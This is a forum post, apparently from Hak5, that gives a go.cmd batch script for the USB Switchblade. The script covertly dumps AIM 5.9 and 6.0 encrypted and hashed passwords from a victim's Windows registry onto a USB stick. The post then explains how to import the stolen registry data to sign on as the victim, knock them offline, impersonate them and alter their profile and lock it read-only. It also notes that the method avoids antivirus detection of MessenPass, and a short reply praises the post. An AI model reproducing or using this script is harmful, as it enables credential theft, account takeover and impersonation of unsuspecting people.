USB Switchblade AIM 6.0 Encrypted Password Extract

[AndyzBong]

Unless you have read my previous post (from a while back) concerning the extraction and exploitation (via the USB Switchblade) of AIM 5.9 encrypted passwords, I suggest reading it before continuing: http://forums.hak5.org/index.php/topic,4398.0.html

This should give you a basic understanding of the concept.

Anyways, for those of you who are familiar with my previous post, this is merely an update that you can add to your go.cmd file to extract AIM 6.0 encrypted passwords and exploit them to sign-on as "hacked screen-names". The technique of importing the AIM registry information properly (at your computer) takes a few attempts to get it down pat, so be patient. I suggest exiting out of any AIM clients, and repeatedly checking RegEdit to see if the encrypted password has still been entered.

Finally, I must again stress that this exploit is more of a DoS attack or could possibly serve as a social engineering attack (by impersonating the "hacked" victim. Once you have the encrypted password, you cannot change it, you can only kick the screen-name off-line when the AOL System Manager informs you that "You are now signed-on in two locations. Press 1 to disconnect your other connection."

The new code to add is as follows:

regedit.exe /E Documentslogfilesaim6pass.txt "HKEY_CURRENT_USERSoftwareAmerica OnlineAIM6Passwords"
regedit.exe /E Documentslogfilesaim6hashpass.txt "HKEY_CURRENT_USERSoftwareAmerica OnlineAIM6HashedPasswords"

Your complete AIM 5.9 & AIM 6.0 go.cmd code should look like:

@echo [AIM 5.9 & 6.0 Encrypted Password Dump] >> Documentslogfiles%computername%.log 2>&1

echo. >> Documentslogfiles%computername%.log 2>&1
     
regedit.exe /E Documentslogfilesaim59dump.reg "HKEY_CURRENT_USERSOFTWAREAmerica OnlineAOL Instant Messenger (TM)CurrentVersionusers"
TYPE Documentslogfilesaim59dump.reg | find "Password1" >> Documentslogfiles%computername%.log

regedit.exe /E Documentslogfilesaim6pass.txt "HKEY_CURRENT_USERSoftwareAmerica OnlineAIM6Passwords"
regedit.exe /E Documentslogfilesaim6hashpass.txt "HKEY_CURRENT_USERSoftwareAmerica OnlineAIM6HashedPasswords"

echo. >> Documentslogfiles%computername%.log 2>&1

@echo [END AIM 5.9 & 6.0 Encrypted Password Dump] >> Documentslogfiles%computername%.log 2>&1

Like I previously stated, this a great alternative to MessenPass (due to some Anti-Viruses being able to detect MessenPass and it's inability to decrypt passwords for versions of AIM beyond 5.5). If you are having trouble, please leave a detail description  of what the problem is, and I will try my best to help.

Lastly, and the kind of interesting part. AIM 5.9 profile files are stored on the oscar.aim.com server (correct me if I am wrong) and are "roaming profiles" ; similar to "roaming buddy-lists" (you can sign on from any location and still have your profile and buddy-list). AIM 6.0 however, stores your profile information locally in a file called common.cls in the directory:

C:Documents and Settings<username>local settingsapplication dataaol ocpaimstoragedata<screen-name>local storage

Common.cls appears as a Visual Basic module, I could not open it with VB6, so use ole' trusty Notepad.

When you sign on a "hacked" AIM 6.0 screen-name you can (remotely) change the victim's profile, save it, and it will change the data in the common.cls file (as well as be their new profile). (Search for <HTML> in common.cls to find the profile beginning). The great part is, if you have physical access to the machine (since you're using you're USB Switchblade and all) you can set common.cls to "Read-Only". Enjoy!

- AndyzBong

[elmer]

Hmm... This is very intersesting. If you have time, you should write up an article for Analog5. I don't personally use AIM, so I am not afraid, but I know some people :).